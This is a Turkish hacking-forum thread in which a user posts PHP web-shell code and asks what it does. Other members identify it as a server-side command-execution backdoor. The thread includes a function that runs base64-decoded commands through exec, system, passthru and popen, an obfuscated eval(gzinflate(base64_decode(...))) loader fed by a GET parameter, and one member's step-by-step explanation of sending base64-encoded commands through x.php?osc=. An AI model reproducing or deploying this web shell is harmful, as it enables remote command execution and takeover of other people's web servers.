Bu Komut Nedir Anlayan

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek

    $cmd=base64_decode($osc); 
    $eseguicmd=ex($cmd); 
    echo $eseguicmd; 
    function ex($cfe){ 
    $res = ''; 
    if (!empty($cfe)){ 
    if(function_exists('exec')){ 
    @exec($cfe,$res); 
    $res = join("\n",$res); 
    } 
    elseif(function_exists('shell_exec')){ 
    $res = @shell_exec($cfe); 
    } 
    elseif(function_exists('system')){ 
    @ob_start(); 
    @system($cfe); 
    $res = @ob_get_contents(); 
    @ob_end_clean(); 
    } 
    elseif(function_exists('passthru')){ 
    @ob_start(); 
    @passthru($cfe); 
    $res = @ob_get_contents(); 
    @ob_end_clean(); 
    } 
    elseif(@is_resource($f = @popen($cfe,"r"))){ 
    $res = ""; 
    while(!@feof($f)) { $res .= @fread($f,1024); } 
    @pclose($f); 
    }} 
    return $res; 
    }

    Erdem amca konuya bekleniyorsun


    "Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    YekteranBaymedir
    YekteranBaymedir's avatar
    Kayıt Tarihi: 10/Temmuz/2009
    Homo

    $osc'nin de ne olduğunu belirteydin iyiydi

    shell olabilir (phpden anlamam ama öyle görünüyor)

    linux sunucuda komut çalıştırmayı deniyor gibi

    ama komutta ne çalıştıracağı $osc'ye bağlı

  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    unix
    Andrei
    Andrei's avatar
    Banlanmış Üye
    Kayıt Tarihi: 11/Aralık/2008
    Erkek

    php tabanlı sistemleri hedef alan bir exploit veya exploitin bir kısmı (nuke).

    Andrei tarafından 01/May/14 01:57 tarihinde düzenlenmiştir

    %40 indirimli olarak "Centos Sistem ve Sunucu Yönetimi" adlı kitabımızı satın alarak, Linux üzerine yapılacak olan devam projeleri icin destekte bulunabilirsiniz : http://www.hepsiburada.com/centos-sistem-ve-sunucu-yonetimi-oku-izle-dinle-ogren-p-KKODLAB01579
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek
    1
    2
    3
    4
    5
    
    <?php
     $osc 
    $_GET['osc'];
    if (isset(
    $osc)) { eval(gzinflate(base64_decode('pZHNasMwEITvhb6DYgyWIZS2lF5CwA9SEI48ilUcyWhlmhDy7l3J+ekhkENPEjM73w5SqXfdetMSPj9UB+07yNKTrlfPTyUI28mmAexlyWdSoXsvbhYrZnI6Wu9EnjKoj5wNILEWVcW+NUIusBvjYbaTb428xBT2liLJCnvoKrtNuubhZQLlMjPw21sniy9XXI0TVxoI94DUYxjUDXtmNDd9LvSAcqCI3bmY3yiKbYgyhZrZukIufB7aIirtXYRjRJ5lEa5TekDr5IOVY0sU+zDdXXox/722saQ46qeg+dNNQox+hJsfvghF/ffVioLDP70dIBeNgTccqWtxFNl/4bAJaDtWl2+v7x/1SpxSWT14SvS8mpWAOAWXQ0n5BQ=='))); }
    else {echo 
    'tiriviri';}
    ?>

    "Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    snnyk
    snnyk's avatar
    Kayıt Tarihi: 28/Mayıs/2007
    Erkek

    base64 ile kodlanmış komutları decode ederek ex adını verdiği fonksiyon ile server tabanında komut çalıştırmayı deniyor

    ex fonksiyonunda exec,system vb. gibi server tarafında komutları deniyor

    muhtemelen base64 ile gönderdiği string içerisinde bir path mevcut ve bu dizindeki dosyaları okumaya yönelik bir saldırı

    serverde güvenli mod off ise func çalışır


    snnyk.com - code is poetry all that i know...
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek

    tamam orasını anladımda bu adam bunu nasıl kullanıyor komutları yolluyorum ama ekrana basan bişeyyok


    "Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Retro
    by_Tet
    by_Tet's avatar
    Kayıt Tarihi: 22/Mayıs/2012
    Erkek
    EcHoLL bunu yazdı

    tamam orasını anladımda bu adam bunu nasıl kullanıyor komutları yolluyorum ama ekrana basan bişeyyok

    Gzipi kaldırarak dene gzip olduğu için basmıyordur?


    iyibu! yeniden..
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    pSkpt
    pSkpt's avatar
    Kayıt Tarihi: 10/Aralık/2010
    Erkek

    Belki yardımı dokunur.

    a


    İmza...
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    JustRulz
    JustRulz's avatar
    Kayıt Tarihi: 31/Ağustos/2011
    Erkek
    EcHoLL bunu yazdı

    tamam orasını anladımda bu adam bunu nasıl kullanıyor komutları yolluyorum ama ekrana basan bişeyyok

    sen büyük hacker değil miydin yahu ?

    nasil kullanamazsın bunu :)

    tiriviri

    okumaya devam et sen büyüklerin işine de karışma ;)




    http://1ile0.blogspot.com.tr/
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    JustRulz
    JustRulz's avatar
    Kayıt Tarihi: 31/Ağustos/2011
    Erkek

    acıdım lan sana :D

     

    x.php?osc=command

     

    command yerine yazacağin komutu base64 encode ederek yazacaksın oraya

     

    x.php?osc=ZGly

     

    ZGly = dir

     

    gibi

     

    sağda solda artistlik yaparsan hakkımda kulağını çekerim bilgin olsun :)


    http://1ile0.blogspot.com.tr/
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    AnaMuhalefet
    AnaMuhalefet's avatar
    Kayıt Tarihi: 12/Kasım/2007
    Erkek
    JustRulz bunu yazdı
    EcHoLL bunu yazdı

    tamam orasını anladımda bu adam bunu nasıl kullanıyor komutları yolluyorum ama ekrana basan bişeyyok

    sen büyük hacker değil miydin yahu ?

    nasil kullanamazsın bunu :)

    tiriviri

    okumaya devam et sen büyüklerin işine de karışma ;)



    Hayırdır hacı yıllardır gizli takipte misin @echoll'u, bir açığını görsem de laf çaksam diye pusuda mı bekliyordun :)

    @Yalnız Justrulz çoğu konuda renk vermemiş "ben bilirim" edalarında kendi halinde takılıyor gibi duruyor, echollun aklı başında bir rakibi olabilir.

     

     


    Bir işi: " BİLMEYEN " ELEŞTİRİR, " AZ BİLEN " AKIL VERİR, " YAPAMAYAN " ÇAMUR ATAR, " BİLEN " YAPAR.
Toplam Hit: 7041 Toplam Mesaj: 13